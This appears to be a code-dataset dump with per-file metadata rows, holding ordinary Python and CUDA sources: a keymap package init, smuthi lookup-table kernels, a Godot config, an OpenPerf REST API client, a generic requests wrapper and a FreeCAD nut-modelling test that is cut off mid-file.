| 31.285714 | 80 | 0.782648 | 137 | 1,095 | 6.124088 | 0.459854 | 0.202622 | 0.164482 | 0.228844 | 0.498212 | 0.398093 | 0.398093 | 0.140644 | 0 | 0 | 0 | 0.03932 | 0.140639 | 1,095 | 34 | 81 | 32.205882 | 0.852285 | 0.463927 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.222222 | true | 0 | 1 | 0 | 1.222222 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8250fe4d2e930d70c12a28744b7af49e0901d971 | 139 | py | Python | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | src/easy_keymap/__init__.py | Thom1729/SublimeConfig | d9dd6b611f6a5ae604e89edd6b809928affc81d7 | [
"MIT"
] | null | null | null | from .easy_keymap import CompileKeymapCommand
from .easy_keymap import CreateEasyKeymapCommand
from .easy_keymap import SaveKeymapListener
| 34.75 | 48 | 0.892086 | 15 | 139 | 8.066667 | 0.466667 | 0.198347 | 0.347107 | 0.495868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086331 | 139 | 3 | 49 | 46.333333 | 0.952756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
82540d6b3a19c79e272d3e6b51eb4c7278a60967 | 3,865 | py | Python | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | smuthi/linearsystem/particlecoupling/prepare_lookup_cuda.py | parkerwray/smuthi-1 | a5ced07461b8fd223dc37d28259261ceed78aed5 | [
"MIT"
] | null | null | null | """This module contains CUDA source code for the preparation of coupling
matrix lookups."""
# This cuda kernel is used for the calculation of volume lookup tables.
volume_lookup_assembly_code = """
#define BLOCKSIZE %i
#define RHO_ARRAY_LENGTH %i
#define Z_ARRAY_LENGTH %i
#define K_ARRAY_LENGTH %i
__global__ void helper(const float *re_bes_jac, const float *im_bes_jac, const float *re_belbee,
const float *im_belbee, const float *re_d_kappa, const float *im_d_kappa,
float *re_result, float *im_result)
{
unsigned int i = blockIdx.x * blockDim.x + threadIdx.x;
if(i >= RHO_ARRAY_LENGTH * Z_ARRAY_LENGTH) return;
unsigned int i_rho = i / Z_ARRAY_LENGTH;
unsigned int i_z = i %% Z_ARRAY_LENGTH;
float re_res = 0.0;
float im_res = 0.0;
int i_kr = i_rho * K_ARRAY_LENGTH;
int i_kz = i_z * K_ARRAY_LENGTH;
float re_integrand_kp1 = re_bes_jac[i_kr] * re_belbee[i_kz] - im_bes_jac[i_kr] * im_belbee[i_kz];
float im_integrand_kp1 = re_bes_jac[i_kr] * im_belbee[i_kz] + im_bes_jac[i_kr] * re_belbee[i_kz];
for (int i_k=0; i_k<(K_ARRAY_LENGTH-1); i_k++)
{
i_kr = i_rho * K_ARRAY_LENGTH + i_k;
i_kz = i_z * K_ARRAY_LENGTH + i_k;
float re_integrand = re_integrand_kp1;
float im_integrand = im_integrand_kp1;
re_integrand_kp1 = re_bes_jac[i_kr+1] * re_belbee[i_kz+1] - im_bes_jac[i_kr+1] * im_belbee[i_kz+1];
im_integrand_kp1 = re_bes_jac[i_kr+1] * im_belbee[i_kz+1] + im_bes_jac[i_kr+1] * re_belbee[i_kz+1];
float re_sint = re_integrand + re_integrand_kp1;
float im_sint = im_integrand + im_integrand_kp1;
re_res += 0.5 * (re_sint * re_d_kappa[i_k] - im_sint * im_d_kappa[i_k]);
im_res += 0.5 * (re_sint * im_d_kappa[i_k] + im_sint * re_d_kappa[i_k]);
}
re_result[i] = re_res;
im_result[i] = im_res;
}"""
# This cuda kernel is used for the calculation of radial lookup tables.
radial_lookup_assembly_code = """
#define BLOCKSIZE %i
#define RHO_ARRAY_LENGTH %i
#define K_ARRAY_LENGTH %i
__global__ void helper(const float *re_bes_jac, const float *im_bes_jac, const float *re_belbee,
const float *im_belbee, const float *re_d_kappa, const float *im_d_kappa,
float *re_result, float *im_result)
{
unsigned int i = blockIdx.x * blockDim.x + threadIdx.x;
if(i >= RHO_ARRAY_LENGTH) return;
float re_res = 0.0;
float im_res = 0.0;
int i_kr = i * K_ARRAY_LENGTH;
float re_integrand_kp1 = re_bes_jac[i_kr] * re_belbee[0] - im_bes_jac[i_kr] * im_belbee[0];
float im_integrand_kp1 = re_bes_jac[i_kr] * im_belbee[0] + im_bes_jac[i_kr] * re_belbee[0];
for (int i_k=0; i_k<(K_ARRAY_LENGTH-1); i_k++)
{
i_kr = i * K_ARRAY_LENGTH + i_k;
float re_integrand = re_integrand_kp1;
float im_integrand = im_integrand_kp1;
re_integrand_kp1 = re_bes_jac[i_kr+1] * re_belbee[i_k+1] - im_bes_jac[i_kr+1] * im_belbee[i_k+1];
im_integrand_kp1 = re_bes_jac[i_kr+1] * im_belbee[i_k+1] + im_bes_jac[i_kr+1] * re_belbee[i_k+1];
float re_sint = re_integrand + re_integrand_kp1;
float im_sint = im_integrand + im_integrand_kp1;
re_res += 0.5 * (re_sint * re_d_kappa[i_k] - im_sint * im_d_kappa[i_k]);
im_res += 0.5 * (re_sint * im_d_kappa[i_k] + im_sint * re_d_kappa[i_k]);
}
re_result[i] = re_res;
im_result[i] = im_res;
}""" | 40.684211 | 111 | 0.59586 | 626 | 3,865 | 3.258786 | 0.095847 | 0.022549 | 0.054902 | 0.070588 | 0.90098 | 0.9 | 0.9 | 0.859804 | 0.835294 | 0.797059 | 0 | 0.020872 | 0.305821 | 3,865 | 95 | 112 | 40.684211 | 0.739471 | 0.058732 | 0 | 0.584615 | 0 | 0.123077 | 0.977974 | 0.012665 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
825ed836fb87c2a78f2009fd4745bac7f8204845 | 152 | py | Python | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | config.py | organicpencil/gdnet3 | b4b951e0cffc0c594ea58de52d3b1eee2222f325 | [
"MIT"
] | null | null | null | def can_build(platform):
return (platform == "x11" or platform == "server" or platform == "windows" or platform == "osx")
def configure(env):
pass
| 25.333333 | 99 | 0.671053 | 20 | 152 | 5.05 | 0.65 | 0.29703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.171053 | 152 | 5 | 100 | 30.4 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.25 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
7d621017a37d03057af3375d6d86d17e1f080de8 | 24,821 | py | Python | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 20 | 2019-12-04T01:28:52.000Z | 2022-03-17T14:09:34.000Z | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 115 | 2020-02-04T21:29:54.000Z | 2022-02-17T13:33:51.000Z | tests/aat/api/v1/client/api/interfaces_api.py | DerangedMonkeyNinja/openperf | cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16 | [
"Apache-2.0"
] | 16 | 2019-12-03T16:41:18.000Z | 2021-11-06T04:44:11.000Z | # coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class InterfacesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def bulk_create_interfaces(self, create, **kwargs): # noqa: E501
"""Bulk create network interfaces # noqa: E501
Create multiple network interfaces. Requests are processed in an all-or-nothing manner, i.e. a single network interface creation failure causes all network interface creations for this request to fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_interfaces(create, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateInterfacesRequest create: Bulk creation (required)
:return: BulkCreateInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_create_interfaces_with_http_info(create, **kwargs) # noqa: E501
else:
(data) = self.bulk_create_interfaces_with_http_info(create, **kwargs) # noqa: E501
return data
def bulk_create_interfaces_with_http_info(self, create, **kwargs): # noqa: E501
"""Bulk create network interfaces # noqa: E501
Create multiple network interfaces. Requests are processed in an all-or-nothing manner, i.e. a single network interface creation failure causes all network interface creations for this request to fail. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_create_interfaces_with_http_info(create, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkCreateInterfacesRequest create: Bulk creation (required)
:return: BulkCreateInterfacesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_create_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create' is set
if ('create' not in params or
params['create'] is None):
raise ValueError("Missing the required parameter `create` when calling `bulk_create_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create' in params:
body_params = params['create']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/x/bulk-create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BulkCreateInterfacesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def bulk_delete_interfaces(self, delete, **kwargs): # noqa: E501
"""Bulk delete network interfaces # noqa: E501
Best-effort delete multiple network interfaces. Non-existent interface ids do not cause errors. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_interfaces(delete, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteInterfacesRequest delete: Bulk delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.bulk_delete_interfaces_with_http_info(delete, **kwargs) # noqa: E501
else:
(data) = self.bulk_delete_interfaces_with_http_info(delete, **kwargs) # noqa: E501
return data
def bulk_delete_interfaces_with_http_info(self, delete, **kwargs): # noqa: E501
"""Bulk delete network interfaces # noqa: E501
Best-effort delete multiple network interfaces. Non-existent interface ids do not cause errors. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bulk_delete_interfaces_with_http_info(delete, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BulkDeleteInterfacesRequest delete: Bulk delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method bulk_delete_interfaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete' is set
if ('delete' not in params or
params['delete'] is None):
raise ValueError("Missing the required parameter `delete` when calling `bulk_delete_interfaces`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete' in params:
body_params = params['delete']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/x/bulk-delete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_interface(self, interface, **kwargs): # noqa: E501
"""Create a network interface # noqa: E501
Create a new network interface. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_interface(interface, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Interface interface: New network interface (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_interface_with_http_info(interface, **kwargs) # noqa: E501
else:
(data) = self.create_interface_with_http_info(interface, **kwargs) # noqa: E501
return data
def create_interface_with_http_info(self, interface, **kwargs): # noqa: E501
"""Create a network interface # noqa: E501
Create a new network interface. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_interface_with_http_info(interface, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Interface interface: New network interface (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['interface'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'interface' is set
if ('interface' not in params or
params['interface'] is None):
raise ValueError("Missing the required parameter `interface` when calling `create_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'interface' in params:
body_params = params['interface']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Interface', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_interface(self, id, **kwargs): # noqa: E501
"""Delete a network interface # noqa: E501
Deletes an existing interface. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_interface(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_interface_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_interface_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_interface_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a network interface # noqa: E501
Deletes an existing interface. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_interface_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_interface`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_interface(self, id, **kwargs): # noqa: E501
"""Get a network interface # noqa: E501
Returns a network interface, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_interface(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_interface_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_interface_with_http_info(id, **kwargs) # noqa: E501
return data
def get_interface_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a network interface # noqa: E501
Returns a network interface, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_interface_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: Interface
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_interface`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Interface', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_interfaces(self, **kwargs): # noqa: E501
"""List network interfaces # noqa: E501
The `interfaces` endpoint returns all network interfaces that are available for use as stack entry/exit points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_interfaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str port_id: Filter by port id
:param str eth_mac_address: Filter by Ethernet MAC address
:param str ipv4_address: Filter by IPv4 address
:param str ipv6_address: Filter by IPv6 address
:return: list[Interface]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_interfaces_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_interfaces_with_http_info(**kwargs) # noqa: E501
return data
def list_interfaces_with_http_info(self, **kwargs): # noqa: E501
"""List network interfaces # noqa: E501
The `interfaces` endpoint returns all network interfaces that are available for use as stack entry/exit points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_interfaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str port_id: Filter by port id
:param str eth_mac_address: Filter by Ethernet MAC address
:param str ipv4_address: Filter by IPv4 address
:param str ipv6_address: Filter by IPv6 address
:return: list[Interface]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['port_id', 'eth_mac_address', 'ipv4_address', 'ipv6_address'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_interfaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'port_id' in params:
query_params.append(('port_id', params['port_id'])) # noqa: E501
if 'eth_mac_address' in params:
query_params.append(('eth_mac_address', params['eth_mac_address'])) # noqa: E501
if 'ipv4_address' in params:
query_params.append(('ipv4_address', params['ipv4_address'])) # noqa: E501
if 'ipv6_address' in params:
query_params.append(('ipv6_address', params['ipv6_address'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/interfaces', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Interface]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.965463 | 224 | 0.612304 | 2,816 | 24,821 | 5.165838 | 0.070668 | 0.052794 | 0.023098 | 0.029697 | 0.928714 | 0.91304 | 0.89503 | 0.8841 | 0.871451 | 0.86279 | 0 | 0.017876 | 0.299061 | 24,821 | 636 | 225 | 39.02673 | 0.818255 | 0.350228 | 0 | 0.755952 | 1 | 0 | 0.174139 | 0.038217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03869 | false | 0 | 0.011905 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7d65c282262709519f880844bec41c754320a076 | 1,700 | py | Python | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | framework/services/rest_client.py | majdukovic/pybooker | b9a373d556be0481c93a528f731407ca7a47b11f | [
"MIT"
] | null | null | null | """
Created on Oct 13, 2019
@author: majdukovic
"""
import requests
class RestClient:
"""
Class for dealing with generic POSTS/UPDATES/GETS/DELETES
"""
default_timeout = 10
def post(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
response = requests.post(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth,
timeout=timeout or self.default_timeout)
return response
def put(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth,
timeout=timeout or self.default_timeout)
return response
def get(self, url=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
response = requests.get(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth,
timeout=timeout or self.default_timeout)
return response
def delete(self, url, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
response = requests.delete(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth,
timeout=timeout or self.default_timeout)
return response
def update(self, url, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None):
response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth,
timeout=timeout or self.default_timeout)
return response
| 36.956522 | 106 | 0.644118 | 218 | 1,700 | 4.949541 | 0.192661 | 0.083411 | 0.064875 | 0.083411 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0.826691 | 0 | 0.006275 | 0.25 | 1,700 | 45 | 107 | 37.777778 | 0.84 | 0.06 | 0 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0 | 0.565217 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
7d6bf1685cf3bbcf1db788f047d5eda98d7a445d | 34,729 | py | Python | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | Brevet_us_4_124_463_water_electrolyzer_2/unit_tests.py | Jay4C/Python-Macros-For_FreeCAD | 12ce5441a26731377fa43e86ccd2be675740d3a0 | [
"MIT"
] | null | null | null | import time
import unittest
import os
import pywinauto.mouse
import pywinauto.keyboard
class brevet_us_4_124_463_water_electrolyser_2_for_industrial_plant(unittest.TestCase):
# ok
def test_part_ecrou_5m(self):
print("test_part_ecrou_5m")
if os.path.exists("part_ecrou_5m.py"):
os.remove("part_ecrou_5m.py")
else:
print("The file does not exist")
# Writing to file
with open("part_ecrou_5m.py", "w") as file:
# Writing data to a file
file.write("""import FreeCAD, Part, Mesh
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_ecrou_5m"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * -0.5
cylinder_1 = Part.makeCylinder(4.5, 4)
cylinder_2 = Part.makeCylinder(2.5, 4)
cylinder_1 = cylinder_1.cut(cylinder_2)
Part.show(cylinder_1)
DOC.recompute()
__objs__=[]
__objs__.append(FreeCAD.getDocument("part_ecrou_5m").getObject("Shape"))
